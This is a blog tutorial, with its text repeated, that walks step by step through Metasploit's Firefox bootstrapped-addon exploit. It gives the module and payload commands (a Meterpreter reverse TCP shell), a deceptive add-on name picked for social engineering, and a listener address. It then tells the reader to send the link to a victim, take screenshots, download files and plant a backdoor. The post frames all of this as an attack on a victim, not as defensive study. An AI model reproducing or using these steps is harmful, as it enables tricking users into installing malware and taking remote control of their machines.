Hey
all as we know that these days users of firefox increased rapidly and
also users like to use addons alot for different purposes like for
removing timelines, for making firefox work more goodly. So it will be
quite easy for doing social engineering and making fool to your victim.
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.
Attacker's Machine --> Backtrack 5
Victim's Machine--> Windows Machine
So let's start, follow me
1. Open metasploit framework and then use exploit firefox xpi bootstrapped addon exploit.
so our command will be use exploit/multi/browser/firefox_xpi_bootstrapped addon.
After that set your payload as per as your choice. For this tutorial i will be using windows/meterpreter/reverse_tcp.
So our command will be set payload windows/meterpreter/reverse_tcp.
So you must get something as shown in below image
2.
Ok so now our exploit and payload are set but now we need to check
whether all the options are ok or not . For that use command show options this will show us all the things necessary for doing this attack.
Now fill all the options with required things.
In my case all the required options are filled as shown in below image.
Information of the things filled-->
set addonname tweak firefox to load faster --> eye catching name for social engineering purpose
set srvhost xxx.xxx.xxx--> your server ip address run the exploit
uripath firefox-tweaker --> make the URL more friendly
set lhost xxx.xxx.xxx--> local ip address to receive connection from victim
3. So if everything is filled correctly then you can start your attack by using exploit command,
Now send your url to the victim in my condition the url is http://192.168,174.130:8080/firefox-tweaker.
4. Our victim will get screen something similar to the below screen.
5. Now if victim successfully installed the addon then we can use sessions -l command to see the information.
We can do many things like taking screenshots,downloading files and also we can put our backdoor for future.
I hope you all enjoyed this tutorial and if u feel any confusion or problem then you may ask in comments.
IF U LIKED THIS POST THEN PLEASE COMMENT AND PLEASE DO NOT COPY
About This Vulnerability
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.
Things Required
Attacker's Machine --> Backtrack 5
Victim's Machine--> Windows Machine
So let's start, follow me
1. Open metasploit framework and then use exploit firefox xpi bootstrapped addon exploit.
so our command will be use exploit/multi/browser/firefox_xpi_bootstrapped addon.
After that set your payload as per as your choice. For this tutorial i will be using windows/meterpreter/reverse_tcp.
So our command will be set payload windows/meterpreter/reverse_tcp.
So you must get something as shown in below image
Now fill all the options with required things.
In my case all the required options are filled as shown in below image.
Information of the things filled-->
set addonname tweak firefox to load faster --> eye catching name for social engineering purpose
set srvhost xxx.xxx.xxx--> your server ip address run the exploit
uripath firefox-tweaker --> make the URL more friendly
set lhost xxx.xxx.xxx--> local ip address to receive connection from victim
3. So if everything is filled correctly then you can start your attack by using exploit command,
Now send your url to the victim in my condition the url is http://192.168,174.130:8080/firefox-tweaker.
4. Our victim will get screen something similar to the below screen.
5. Now if victim successfully installed the addon then we can use sessions -l command to see the information.
We can do many things like taking screenshots,downloading files and also we can put our backdoor for future.
I hope you all enjoyed this tutorial and if u feel any confusion or problem then you may ask in comments.
IF U LIKED THIS POST THEN PLEASE COMMENT AND PLEASE DO NOT COPY
Great article! We will be linking to this great article on our website.
ReplyDeleteKeep up the good writing.
My web blog - gold watches - westkueste-usa.de -